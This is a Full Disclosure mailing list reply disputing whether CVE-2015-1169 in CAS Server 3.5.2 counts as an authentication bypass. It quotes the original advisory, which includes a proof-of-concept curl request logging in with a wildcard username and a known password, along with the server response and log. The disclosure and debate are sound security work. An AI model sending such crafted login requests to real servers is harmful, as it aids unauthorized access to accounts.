Full Disclosure mailing list archives

Re: CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards.

From: "Paul B. Henson" <henson () acm org>
Date: Wed, 28 Jan 2015 17:48:35 -0800

This CVE claims CAS has a vulnerability that "allows remote attackers to
bypass LDAP authentication via crafted wildcards". My understanding of
an "authentication bypass" vulnerability is one that actually bypasses
authentication, accessing a resource without having to authenticate, as
enumerated at http://cwe.mitre.org/data/definitions/592.html

The actual vulnerability here is that if you are using the LDAP
authenticator that does a search for the supplied username and then
authenticates against the DN returned (as opposed to the LDAP
authenticator that directly constructs a bind DN from the username), it
does not properly escape wildcards in the supplied username when it does
the search, allowing you to authenticate with a username consisting of a
wildcard that matches the username *AND* the valid password for that
username. In addition, the supplied wildcard must match one and only one
entry in the ldap directory, as authentication will fail otherwise.

I don't think this is in any way an authentication bypass.
Authentication is being performed with an (almost valid) username and a
valid password, and while the issue does allow you to use a username
that's not an exact match, it still requires you to know the correct
password for that username and for the "not exact" match to be so
specific as to only match one user.

On Wed, Jan 21, 2015 at 12:49:38PM -0200, J. Tozo wrote:

=====[Alligator Security Team - Security Advisory]========

  CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
authentication via crafted wildcards.

  Reporter: José Tozo  < juniorbsd () gmail com >

=====[Table of Contents]==================================

1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References

=====[1. Background]======================================

 CAS is an authentication system originally created by Yale University to
provide a trusted way for an application to authenticate a user.

=====[2. Detailed description]============================

A valid username and password required.

Given a username johndoe and a password superpass, you can sucessfully
achieve login using wildcards:

username: jo*
password: superpass

The login will be sucessfully only if the ldap bind search return one
unique member.

The vulnerability described in this document can be validated using the
following example:

Client Request:
root@machine:/# curl -k -L -d "username=jo%2A&password=superpass"
https://login.cas-server.com/v1/tickets

(note that * was url encoded to %2A)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
   <head>
      <title>201 The request has been fulfilled and resulted in a new
resource being created</title>
   </head>
   <body>
      <h1>TGT Created</h1>
      <form action="
https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz";
method="POST">Service:<input type="text" name="service" value=""><br><input
type="submit" value="Submit"></form>
   </body>
</html>

Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================

=====[3. Other contexts & solutions]======================

 In order to apply the patch, you have to update at least to version 3.5.3.
Newer versions, such as CAS 4.0.0 and above, are not vulnerable.

=====[4. Timeline]========================================

29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.

=====[5. References]=======================================

1 - https://github.com/Jasig/cas/pull/411
2 -
https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c

-- 
Grato,

 Tozo


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards. J. Tozo (Jan 21)
- Re: CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards. Paul B. Henson (Jan 28)